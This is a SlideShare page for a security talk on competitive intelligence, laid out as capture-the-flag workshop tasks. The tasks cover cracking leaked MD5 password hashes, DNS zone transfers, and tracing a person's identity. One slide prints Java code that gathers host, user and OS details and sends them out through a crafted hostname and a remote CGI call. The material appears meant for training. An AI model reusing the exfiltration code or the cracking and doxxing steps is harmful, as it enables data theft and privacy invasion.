SlideShare ist ein Scribd-Unternehmen logo

Security Hole #11 - Competitive intelligence - Beliaiev

Als PPTX, PDF herunterladen
Nazar Tymoshyk, CEH, Ph.D.
Nazar Tymoshyk, CEH, Ph.D.
Technologie
1 von 29
Competitive Intelligence – Competitor's Fatality Igor Beliaiev
What is Competitive Intelligence(CI)?
Basic methods
Start is here: goo.gl/ygm51k Інфо ебаут хак The Workshop
Task #1. Intro We know that Mikko Kuttonen is using github. His github for working staff is mikkoKut1 You have to find his password for the home media server(107.170.*.*).
Task #2. Pakistani There is a hacker from Pakistan. He is paid for hunting for a different journalists, that show how things in Ukraine are going on during the revolution. We have some information about his last attacks, so we have to find out what he has done with his victims.
We have some dump with journalist's accounts on times.com. (times.zip) Let's find any password, that he could hack. We know that only one of those accounts got hacked, so we have to find the easiest password. Task #2. Pakistani Hint! Journalist’s passwords are encrypted with MD5 algorithm Hint! You can use MD5 online decoders
Task #3. Archive As you can see, we also have another archive with file zik.doc, which we need, but it's encrypted. We need to read the data from zikua.doc Hint! Look carefully for the files in archives. Are there any common things? Hint! You might also use some tools, which you have got with the tasks. But remember, you don’t have much time.
Task #4. Zik.ua From the previous task we have got information, that there are some important files on torrent server on a*****.zik.ua We need to find the subdomain and torrent server. Hint! DNS-requests might help you Hint! You can try to use AXFR-requests
$1mln/month ValveSoftware.com
Task #5. Find the hacker Finally we managed to find the real IP address of Pakistani hacker, and even bruteforce his RDP password. We started to download his private files, but suddenly connection was lost...forever. We managed to download only one file. Using this file, find the name of the hacker!
Task #5. Find the hacker
• Nickname: johnsmith@athc.biz • Find his place and date of birth Tasks from PHDays
Tasks from PHDays
Tasks from PHDays
Tasks from PHDays
Tasks from PHDays String str1 = System.getProperty("os.name"); String str2 = System.getProperty("user.name"); InetAddress localInetAddress2 = InetAddress.getLocalHost(); InetAddress[] arrayOfInetAddress = InetAddress.getAllByName(localInetAddress2.getCanonicalHostName()); String str3 = arrayOfInetAddress[0].toString(); InetAddress localInetAddress1 = InetAddress.getLocalHost(); String str4 = localInetAddress1.getHostName(); String str5 = toHexString(str4.getBytes()) + toHexString("|".getBytes()) + toHexString(str2.getBytes()) + toHexString("|".getBytes()) + toHexString(str1.getBytes()); if (str5.length() > 63) { str5 = str5.substring(0, 63); } Socket localSocket = new Socket(str5 + paramString2, 80); String str6 = readAll(localSocket); String str7 = "access=true"; if (str6.contains(str7)) { localSocket = new Socket(paramString1 + "/loadsmb.cgi?host=" + str3 + "&file=/", 80);
Tasks from PHDays + WebRTC (net.ipcalf.com)
Tasks from PHDays
? ?

Empfohlen

4055-841_Project_ShailendraSadh
4055-841_Project_ShailendraSadh4055-841_Project_ShailendraSadh
4055-841_Project_ShailendraSadhShailendra Sadh - CISSP
 
No-Knowledge Crypto Attacks
No-Knowledge Crypto AttacksNo-Knowledge Crypto Attacks
No-Knowledge Crypto AttacksBaronZor
 
Bsides chicago 2013 honeypots
Bsides chicago 2013 honeypotsBsides chicago 2013 honeypots
Bsides chicago 2013 honeypotsTazdrumm3r
 
CensorMeOrNot - P2P System of DNS Caches - DefCamp 2012
CensorMeOrNot - P2P System of DNS Caches - DefCamp 2012CensorMeOrNot - P2P System of DNS Caches - DefCamp 2012
CensorMeOrNot - P2P System of DNS Caches - DefCamp 2012DefCamp
 
osint + python: extracting information from tor network and darkweb
osint + python: extracting information from tor network and darkweb osint + python: extracting information from tor network and darkweb
osint + python: extracting information from tor network and darkweb Jose Manuel Ortega Candel
 
อินเทอร์เน็ต (Internet)
อินเทอร์เน็ต (Internet)อินเทอร์เน็ต (Internet)
อินเทอร์เน็ต (Internet)thummapron
 
Bsides detroit 2013 honeypots
Bsides detroit 2013 honeypotsBsides detroit 2013 honeypots
Bsides detroit 2013 honeypotsTazdrumm3r
 
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis ENGangSeok Lee
 

Empfohlen

4055-841_Project_ShailendraSadh
4055-841_Project_ShailendraSadh4055-841_Project_ShailendraSadh
4055-841_Project_ShailendraSadhShailendra Sadh - CISSP
 
No-Knowledge Crypto Attacks
No-Knowledge Crypto AttacksNo-Knowledge Crypto Attacks
No-Knowledge Crypto AttacksBaronZor
 
Bsides chicago 2013 honeypots
Bsides chicago 2013 honeypotsBsides chicago 2013 honeypots
Bsides chicago 2013 honeypotsTazdrumm3r
 
CensorMeOrNot - P2P System of DNS Caches - DefCamp 2012
CensorMeOrNot - P2P System of DNS Caches - DefCamp 2012CensorMeOrNot - P2P System of DNS Caches - DefCamp 2012
CensorMeOrNot - P2P System of DNS Caches - DefCamp 2012DefCamp
 
osint + python: extracting information from tor network and darkweb
osint + python: extracting information from tor network and darkweb osint + python: extracting information from tor network and darkweb
osint + python: extracting information from tor network and darkweb Jose Manuel Ortega Candel
 
อินเทอร์เน็ต (Internet)
อินเทอร์เน็ต (Internet)อินเทอร์เน็ต (Internet)
อินเทอร์เน็ต (Internet)thummapron
 
Bsides detroit 2013 honeypots
Bsides detroit 2013 honeypotsBsides detroit 2013 honeypots
Bsides detroit 2013 honeypotsTazdrumm3r
 
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis ENGangSeok Lee
 
Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"
Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"
Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"Nazar Tymoshyk, CEH, Ph.D.
 
Hack through Injections
Hack through InjectionsHack through Injections
Hack through InjectionsNazar Tymoshyk, CEH, Ph.D.
 
Security Hole #11 - Unusual security vulnerabilities - Yuriy Bilyk
Security Hole #11 - Unusual security vulnerabilities - Yuriy BilykSecurity Hole #11 - Unusual security vulnerabilities - Yuriy Bilyk
Security Hole #11 - Unusual security vulnerabilities - Yuriy BilykNazar Tymoshyk, CEH, Ph.D.
 
Agile and Secure SDLC
Agile and Secure SDLCAgile and Secure SDLC
Agile and Secure SDLCNazar Tymoshyk, CEH, Ph.D.
 
El inventario
El inventarioEl inventario
El inventariogkltravieso
 
Makalah agama islam
Makalah agama islamMakalah agama islam
Makalah agama islamSMAN 54 Jakarta
 
Team 4
Team 4Team 4
Team 4YGHCC14
 
See andrew week2_ignite_presentation_slidesow
See andrew week2_ignite_presentation_slidesowSee andrew week2_ignite_presentation_slidesow
See andrew week2_ignite_presentation_slidesowandyfullsail
 
Superbowl Ad review vu par Leo Burnett France
Superbowl Ad review vu par Leo Burnett FranceSuperbowl Ad review vu par Leo Burnett France
Superbowl Ad review vu par Leo Burnett FrancePlanningLeoBurnettFrance
 
Manegerial communication
Manegerial communicationManegerial communication
Manegerial communicationValarmathi Chinnaswamy
 
Rica Belna and Friends_Art for Interior Design: Selection of works.
Rica Belna and Friends_Art for Interior Design: Selection of works.Rica Belna and Friends_Art for Interior Design: Selection of works.
Rica Belna and Friends_Art for Interior Design: Selection of works.Petra Trimmel - Product Management Hub | Art-Y-Sana
 
Andrés alfaro salas
Andrés alfaro salasAndrés alfaro salas
Andrés alfaro salasAndrés Alfaro
 
JAVA Business Application
JAVA Business ApplicationJAVA Business Application
JAVA Business ApplicationJackie Wolf
 
Music videos
Music videosMusic videos
Music videosCharLilyMay
 
Prijemni trigonometrijski-izrazi
Prijemni trigonometrijski-izraziPrijemni trigonometrijski-izrazi
Prijemni trigonometrijski-izraziKostic Valentina
 
4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx
4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx
4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptxanlio
 
Rpp bi new
Rpp bi newRpp bi new
Rpp bi newAkio Hiba
 
Whey gold standard da optimum nutrition
Whey gold standard da optimum nutritionWhey gold standard da optimum nutrition
Whey gold standard da optimum nutritionPaul Davidson
 
Music through the ages
Music through the ages Music through the ages
Music through the ages CharLilyMay
 
Team 5
Team 5Team 5
Team 5YGHCC14
 
Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzDeepanshu Gajbhiye
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Positive Hack Days
 

Weitere ähnliche Inhalte

Andere mochten auch

Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"
Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"
Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"Nazar Tymoshyk, CEH, Ph.D.
 
Security Hole #11 - Unusual security vulnerabilities - Yuriy Bilyk
Security Hole #11 - Unusual security vulnerabilities - Yuriy BilykSecurity Hole #11 - Unusual security vulnerabilities - Yuriy Bilyk
Security Hole #11 - Unusual security vulnerabilities - Yuriy BilykNazar Tymoshyk, CEH, Ph.D.
 
See andrew week2_ignite_presentation_slidesow
See andrew week2_ignite_presentation_slidesowSee andrew week2_ignite_presentation_slidesow
See andrew week2_ignite_presentation_slidesowandyfullsail
 
Superbowl Ad review vu par Leo Burnett France
Superbowl Ad review vu par Leo Burnett FranceSuperbowl Ad review vu par Leo Burnett France
Superbowl Ad review vu par Leo Burnett FrancePlanningLeoBurnettFrance
 
JAVA Business Application
JAVA Business ApplicationJAVA Business Application
JAVA Business ApplicationJackie Wolf
 
Prijemni trigonometrijski-izrazi
Prijemni trigonometrijski-izraziPrijemni trigonometrijski-izrazi
Prijemni trigonometrijski-izraziKostic Valentina
 
4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx
4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx
4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptxanlio
 
Whey gold standard da optimum nutrition
Whey gold standard da optimum nutritionWhey gold standard da optimum nutrition
Whey gold standard da optimum nutritionPaul Davidson
 
Music through the ages
Music through the ages Music through the ages
Music through the ages CharLilyMay
 

Andere mochten auch (20)

Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"
Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"
Security Hole #12 Lviv SoftServe-Symphony Solutions "Lockpicking Authentication"
 
Hack through Injections
Hack through InjectionsHack through Injections
Hack through Injections
 
Security Hole #11 - Unusual security vulnerabilities - Yuriy Bilyk
Security Hole #11 - Unusual security vulnerabilities - Yuriy BilykSecurity Hole #11 - Unusual security vulnerabilities - Yuriy Bilyk
Security Hole #11 - Unusual security vulnerabilities - Yuriy Bilyk
 
Agile and Secure SDLC
Agile and Secure SDLCAgile and Secure SDLC
Agile and Secure SDLC
 
El inventario
El inventarioEl inventario
El inventario
 
Makalah agama islam
Makalah agama islamMakalah agama islam
Makalah agama islam
 
Team 4
Team 4Team 4
Team 4
 
See andrew week2_ignite_presentation_slidesow
See andrew week2_ignite_presentation_slidesowSee andrew week2_ignite_presentation_slidesow
See andrew week2_ignite_presentation_slidesow
 
Superbowl Ad review vu par Leo Burnett France
Superbowl Ad review vu par Leo Burnett FranceSuperbowl Ad review vu par Leo Burnett France
Superbowl Ad review vu par Leo Burnett France
 
Manegerial communication
Manegerial communicationManegerial communication
Manegerial communication
 
Rica Belna and Friends_Art for Interior Design: Selection of works.
Rica Belna and Friends_Art for Interior Design: Selection of works.Rica Belna and Friends_Art for Interior Design: Selection of works.
Rica Belna and Friends_Art for Interior Design: Selection of works.
 
Andrés alfaro salas
Andrés alfaro salasAndrés alfaro salas
Andrés alfaro salas
 
JAVA Business Application
JAVA Business ApplicationJAVA Business Application
JAVA Business Application
 
Music videos
Music videosMusic videos
Music videos
 
Prijemni trigonometrijski-izrazi
Prijemni trigonometrijski-izraziPrijemni trigonometrijski-izrazi
Prijemni trigonometrijski-izrazi
 
4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx
4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx
4 οκτωβρίου εκδηλωση για την ημέρα προστασίας των ζώων.pptx
 
Rpp bi new
Rpp bi newRpp bi new
Rpp bi new
 
Whey gold standard da optimum nutrition
Whey gold standard da optimum nutritionWhey gold standard da optimum nutrition
Whey gold standard da optimum nutrition
 
Music through the ages
Music through the ages Music through the ages
Music through the ages
 
Team 5
Team 5Team 5
Team 5
 

Ähnlich wie Security Hole #11 - Competitive intelligence - Beliaiev

Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzDeepanshu Gajbhiye
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Positive Hack Days
 
Corporate Secret Challenge - CyberDefenders.org by Azad
Corporate Secret Challenge - CyberDefenders.org by AzadCorporate Secret Challenge - CyberDefenders.org by Azad
Corporate Secret Challenge - CyberDefenders.org by AzadAzad Mzuri
 
Exploiting null byte vm
Exploiting null byte vmExploiting null byte vm
Exploiting null byte vmdevanshdubey7
 
Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016
Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016
Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016Tim Butler
 
Advanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCONAdvanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCONLyon Yang
 
Footprinting-and-the-basics-of-hacking
Footprinting-and-the-basics-of-hackingFootprinting-and-the-basics-of-hacking
Footprinting-and-the-basics-of-hackingSathishkumar A
 
Fighting Malware Without Antivirus
Fighting Malware Without AntivirusFighting Malware Without Antivirus
Fighting Malware Without AntivirusEnergySec
 
Case Project 7-1 commen, diicrerne functions, arii price. wri.pdf
Case Project 7-1 commen, diicrerne functions, arii price. wri.pdfCase Project 7-1 commen, diicrerne functions, arii price. wri.pdf
Case Project 7-1 commen, diicrerne functions, arii price. wri.pdff3apparelsonline
 
Ulfah
UlfahUlfah
Ulfahulfah
 
CONFidence 2015: iOS Hacking: Advanced Pentest & Forensic Techniques - Omer S...
CONFidence 2015: iOS Hacking: Advanced Pentest & Forensic Techniques - Omer S...CONFidence 2015: iOS Hacking: Advanced Pentest & Forensic Techniques - Omer S...
CONFidence 2015: iOS Hacking: Advanced Pentest & Forensic Techniques - Omer S...PROIDEA
 
iOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic TechniquesiOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic TechniquesÖmer Coşkun
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKINGNAWAZ KHAN
 
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...CODE BLUE
 
EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.Eric Monti
 
Hackers are innocent
Hackers are innocentHackers are innocent
Hackers are innocentdanish3
 
Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...
Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...
Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...Cyphort
 

Ähnlich wie Security Hole #11 - Competitive intelligence - Beliaiev (20)

Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritz
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
 
Phd final
Phd finalPhd final
Phd final
 
Corporate Secret Challenge - CyberDefenders.org by Azad
Corporate Secret Challenge - CyberDefenders.org by AzadCorporate Secret Challenge - CyberDefenders.org by Azad
Corporate Secret Challenge - CyberDefenders.org by Azad
 
Exploiting null byte vm
Exploiting null byte vmExploiting null byte vm
Exploiting null byte vm
 
Hacking
HackingHacking
Hacking
 
Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016
Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016
Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016
 
Advanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCONAdvanced SOHO Router Exploitation XCON
Advanced SOHO Router Exploitation XCON
 
Footprinting-and-the-basics-of-hacking
Footprinting-and-the-basics-of-hackingFootprinting-and-the-basics-of-hacking
Footprinting-and-the-basics-of-hacking
 
Fighting Malware Without Antivirus
Fighting Malware Without AntivirusFighting Malware Without Antivirus
Fighting Malware Without Antivirus
 
Cryptography Attacks and Applications
Cryptography Attacks and ApplicationsCryptography Attacks and Applications
Cryptography Attacks and Applications
 
Case Project 7-1 commen, diicrerne functions, arii price. wri.pdf
Case Project 7-1 commen, diicrerne functions, arii price. wri.pdfCase Project 7-1 commen, diicrerne functions, arii price. wri.pdf
Case Project 7-1 commen, diicrerne functions, arii price. wri.pdf
 
Ulfah
UlfahUlfah
Ulfah
 
CONFidence 2015: iOS Hacking: Advanced Pentest & Forensic Techniques - Omer S...
CONFidence 2015: iOS Hacking: Advanced Pentest & Forensic Techniques - Omer S...CONFidence 2015: iOS Hacking: Advanced Pentest & Forensic Techniques - Omer S...
CONFidence 2015: iOS Hacking: Advanced Pentest & Forensic Techniques - Omer S...
 
iOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic TechniquesiOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic Techniques
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKING
 
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
[CB19] I KNOW WHAT YOU DID LAST NIGHT : Pwning The State-Of-The-Art the IoT H...
 
EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.EkoParty 2010: iPhone Rootkit? There's an App for that.
EkoParty 2010: iPhone Rootkit? There's an App for that.
 
Hackers are innocent
Hackers are innocentHackers are innocent
Hackers are innocent
 
Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...
Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...
Malware’s Most Wanted: NightHunter. A Massive Campaign to Steal Credentials R...
 

Mehr von Nazar Tymoshyk, CEH, Ph.D.

Black magic of web attacks Detection and Prevention
Black magic of web attacks Detection and PreventionBlack magic of web attacks Detection and Prevention
Black magic of web attacks Detection and PreventionNazar Tymoshyk, CEH, Ph.D.
 
Security as a new metric for Business, Product and Development Lifecycle
Security as a new metric for Business, Product and Development LifecycleSecurity as a new metric for Business, Product and Development Lifecycle
Security as a new metric for Business, Product and Development LifecycleNazar Tymoshyk, CEH, Ph.D.
 
"Аеророзвідка-Львів": Розвиток безпілотної авіації через волонтерський рух
"Аеророзвідка-Львів": Розвиток безпілотної авіації через волонтерський рух"Аеророзвідка-Львів": Розвиток безпілотної авіації через волонтерський рух
"Аеророзвідка-Львів": Розвиток безпілотної авіації через волонтерський рухNazar Tymoshyk, CEH, Ph.D.
 
OWASP Top 10 practice workshop by Stanislav Breslavskyi
OWASP Top 10 practice workshop by Stanislav BreslavskyiOWASP Top 10 practice workshop by Stanislav Breslavskyi
OWASP Top 10 practice workshop by Stanislav BreslavskyiNazar Tymoshyk, CEH, Ph.D.
 
Проект реабілітації військових в ІТ
Проект реабілітації військових в ІТПроект реабілітації військових в ІТ
Проект реабілітації військових в ІТNazar Tymoshyk, CEH, Ph.D.
 

Mehr von Nazar Tymoshyk, CEH, Ph.D. (8)

Black magic of web attacks Detection and Prevention
Black magic of web attacks Detection and PreventionBlack magic of web attacks Detection and Prevention
Black magic of web attacks Detection and Prevention
 
CIA Hacking Organization in the Nutshell
CIA Hacking Organization in the NutshellCIA Hacking Organization in the Nutshell
CIA Hacking Organization in the Nutshell
 
Security as a new metric for Business, Product and Development Lifecycle
Security as a new metric for Business, Product and Development LifecycleSecurity as a new metric for Business, Product and Development Lifecycle
Security as a new metric for Business, Product and Development Lifecycle
 
"Аеророзвідка-Львів": Розвиток безпілотної авіації через волонтерський рух
"Аеророзвідка-Львів": Розвиток безпілотної авіації через волонтерський рух"Аеророзвідка-Львів": Розвиток безпілотної авіації через волонтерський рух
"Аеророзвідка-Львів": Розвиток безпілотної авіації через волонтерський рух
 
OWASP Top 10 practice workshop by Stanislav Breslavskyi
OWASP Top 10 practice workshop by Stanislav BreslavskyiOWASP Top 10 practice workshop by Stanislav Breslavskyi
OWASP Top 10 practice workshop by Stanislav Breslavskyi
 
Automotive security testing
Automotive security testing Automotive security testing
Automotive security testing
 
Agile and Secure Development
Agile and Secure DevelopmentAgile and Secure Development
Agile and Secure Development
 
Проект реабілітації військових в ІТ
Проект реабілітації військових в ІТПроект реабілітації військових в ІТ
Проект реабілітації військових в ІТ
 

Kürzlich hochgeladen

So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesManik S Magar
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxfnnc6jmgwh
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Kaya Weers
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...itnewsafrica
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024TopCSSGallery
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Alkin Tezuysal
 

Kürzlich hochgeladen (20)

So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
